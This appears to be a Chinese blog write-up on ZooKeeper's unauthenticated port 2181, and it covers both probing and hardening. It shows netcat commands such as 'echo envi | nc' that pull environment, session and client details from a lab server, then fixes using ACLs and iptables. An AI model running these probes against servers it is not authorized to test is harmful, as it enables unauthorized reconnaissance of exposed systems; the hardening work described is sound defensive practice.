一、漏洞详情
Zookeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。
Zookeeper的默认开放端口是2181。Zookeeper 安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用 Zookeeper,通过服务器收集敏感信息或者在 Zookeeper 集群内进行破坏(比如:kill命令)。攻击者能够执行所有只允许由管理员运行的命令。
二、漏洞利用(未做任何授权)
1、envi:打印有关服务环境的详细信息。
[root@centos7 bin]# echo envi |nc 192.168.43.101 2181
Environment:
zookeeper.version=3.4.6-1569965, built on 02/20/2014 09:09 GMT
host.name=localhost
java.version=1.8.0_181
java.vendor=Oracle Corporation
java.home=/usr/lib/jvm/java-1.8.0-openjdk-1.8.0.181-7.b13.el7.x86_64/jre
java.class.path=/usr/local/src/zookeeper-3.4.6/bin/../build/classes:/usr/local/src/zookeeper-3.4.6/bin/../build/lib/*.jar:/usr/local/src/zookeeper-3.4.6/bin/../lib/slf4j-log4j12-1.6.1.jar:/usr/local/src/zookeeper-3.4.6/bin/../lib/slf4j-api-1.6.1.jar:/usr/local/src/zookeeper-3.4.6/bin/../lib/netty-3.7.0.Final.jar:/usr/local/src/zookeeper-3.4.6/bin/../lib/log4j-1.2.16.jar:/usr/local/src/zookeeper-3.4.6/bin/../lib/jline-0.9.94.jar:/usr/local/src/zookeeper-3.4.6/bin/../zookeeper-3.4.6.jar:/usr/local/src/zookeeper-3.4.6/bin/../src/java/lib/*.jar:/usr/local/src/zookeeper-3.4.6/bin/../conf:
java.library.path=/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
java.io.tmpdir=/tmp
java.compiler=<NA>
os.name=Linux
os.arch=amd64
os.version=3.10.0-957.el7.x86_64
user.name=root
user.home=/root
user.dir=/usr/local/src/zookeeper-3.4.6/bin
2、ruok:测试服务器是否运行在非错误状态。
[root@centos7 bin]# echo ruok |nc 192.168.43.101 2181
imok
3、reqs:列出未完成的请求。(我这边是无请求)
[root@centos7 bin]# echo reqs |nc 192.168.43.101 2181
4、dump:列出未完成的会话和临时节点。
[root@centos7 bin]# echo dump |nc 192.168.43.101 2181
SessionTracker dump:
Session Sets (3):
0 expire at Mon Jun 26 17:08:38 CST 2023:
0 expire at Mon Jun 26 17:08:48 CST 2023:
1 expire at Mon Jun 26 17:08:58 CST 2023:
0x188f02e23b10008
ephemeral nodes dump:
Sessions with Ephemerals (0):
5、stat:列出关于性能和连接的客户端的统计信息。
[root@centos7 bin]# echo stat |nc 192.168.43.101 2181
Zookeeper version: 3.4.6-1569965, built on 02/20/2014 09:09 GMT
Clients:
/192.168.43.102:50186[0](queued=0,recved=1,sent=0)
/127.0.0.1:43916[1](queued=0,recved=114,sent=114)
Latency min/avg/max: 0/0/160
Received: 887
Sent: 886
Connections: 2
Outstanding: 0
Zxid: 0x19
Mode: standalone
Node count: 4
三、漏洞处理
网上搜索了很多处理方法,比如zookeeper中acl指定IP
1、指定ip
这边使用两台机器进行验证,两台机器的IP分别为192.168.43.101、192.168.43.102,部署相同的zookeeper版本
1》101机器登录zookeeper客户端
[root@centos7 bin]# ./zkCli.sh
[zk: localhost:2181(CONNECTED) 0] ls /
[zookeeper]
[zk: localhost:2181(CONNECTED) 1] getAcl /
'world,'anyone
: cdrwa
102机器远程访问
[root@centos7 bin]# ./zkCli.sh
[zk: localhost:2181(CONNECTED) 1] connect 192.168.43.101:2181
2023-06-26 17:16:27,504 [myid:] - INFO [main:ZooKeeper@684] - Session: 0x188f6acabb40000 closed
2023-06-26 17:16:27,505 [myid:] - INFO [main:ZooKeeper@438] - Initiating client connection, connectString=192.168.43.101:2181 sessionTimeout=30000 watcher=org.apache.zookeeper.ZooKeeperMain$MyWatcher@15615099
2023-06-26 17:16:27,505 [myid:] - INFO [main-EventThread:ClientCnxn$EventThread@512] - EventThread shut down
[zk: 192.168.43.101:2181(CONNECTING) 2] 2023-06-26 17:16:27,508 [myid:] - INFO [main-SendThread(192.168.43.101:2181):ClientCnxn$SendThread@975] - Opening socket connection to server 192.168.43.101/192.168.43.101:2181. Will not attempt to authenticate using SASL (unknown error)
2023-06-26 17:16:27,510 [myid:] - INFO [main-SendThread(192.168.43.101:2181):ClientCnxn$SendThread@852] - Socket connection established to 192.168.43.101/192.168.43.101:2181, initiating session
2023-06-26 17:16:27,513 [myid:] - INFO [main-SendThread(192.168.43.101:2181):ClientCnxn$SendThread@1235] - Session establishment complete on server 192.168.43.101/192.168.43.101:2181, sessionid = 0x188f02e23b1000b, negotiated timeout = 30000
WATCHER::
WatchedEvent state:SyncConnected type:None path:null
ls /
[zookeeper]
[zk: 192.168.43.101:2181(CONNECTED) 3]
2》设置acl权限
101机器设置权限
[zk: localhost:2181(CONNECTED) 1] getAcl /
'world,'anyone
: cdrwa
[zk: localhost:2181(CONNECTED) 2] setAcl / ip:127.0.0.1:cdrwa
cZxid = 0x0
ctime = Thu Jan 01 08:00:00 CST 1970
mZxid = 0x0
mtime = Thu Jan 01 08:00:00 CST 1970
pZxid = 0x0
cversion = -1
dataVersion = 0
aclVersion = 6
ephemeralOwner = 0x0
dataLength = 0
numChildren = 1
[zk: localhost:2181(CONNECTED) 3] getAcl /
'ip,'127.0.0.1
: cdrwa
102机器连接101的zookeeper,登录失败
[zk: localhost:2181(CONNECTED) 1] connect 192.168.43.101:2181
2023-06-26 17:18:46,902 [myid:] - INFO [main:ZooKeeper@684] - Session: 0x188f6acabb40001 closed
2023-06-26 17:18:46,902 [myid:] - INFO [main:ZooKeeper@438] - Initiating client connection, connectString=192.168.43.101:2181 sessionTimeout=30000 watcher=org.apache.zookeeper.ZooKeeperMain$MyWatcher@11028347
[zk: 192.168.43.101:2181(CONNECTING) 2] 2023-06-26 17:18:46,903 [myid:] - INFO [main-EventThread:ClientCnxn$EventThread@512] - EventThread shut down
2023-06-26 17:18:46,905 [myid:] - INFO [main-SendThread(192.168.43.101:2181):ClientCnxn$SendThread@975] - Opening socket connection to server 192.168.43.101/192.168.43.101:2181. Will not attempt to authenticate using SASL (unknown error)
2023-06-26 17:18:46,907 [myid:] - INFO [main-SendThread(192.168.43.101:2181):ClientCnxn$SendThread@852] - Socket connection established to 192.168.43.101/192.168.43.101:2181, initiating session
2023-06-26 17:18:46,911 [myid:] - INFO [main-SendThread(192.168.43.101:2181):ClientCnxn$SendThread@1235] - Session establishment complete on server 192.168.43.101/192.168.43.101:2181, sessionid = 0x188f02e23b1000c, negotiated timeout = 30000
WATCHER::
WatchedEvent state:SyncConnected type:None path:null
[zk: 192.168.43.101:2181(CONNECTED) 3] ls /
Authentication is not valid : /
设置完acl权限,继续使用漏洞扫描,还是可以继续扫描到系统信息
2、zookeeper服务器设置防火墙
#允许指定的IP访问2181端口,记得把本机的IP加上,不然本机也不能访问zookeeper
[root@centos7 ~]# iptables -A INPUT -s 192.168.43.101 -p tcp --dport 2181 -j ACCEPT
#只要访问2181端口的请求全部丢弃
[root@centos7 ~]# iptables -A INPUT -p tcp --dport 2181 -j DROP
漏洞扫描报超时
[root@centos7 conf]# echo envi |nc 192.168.43.101 2181
Ncat: Connection timed out.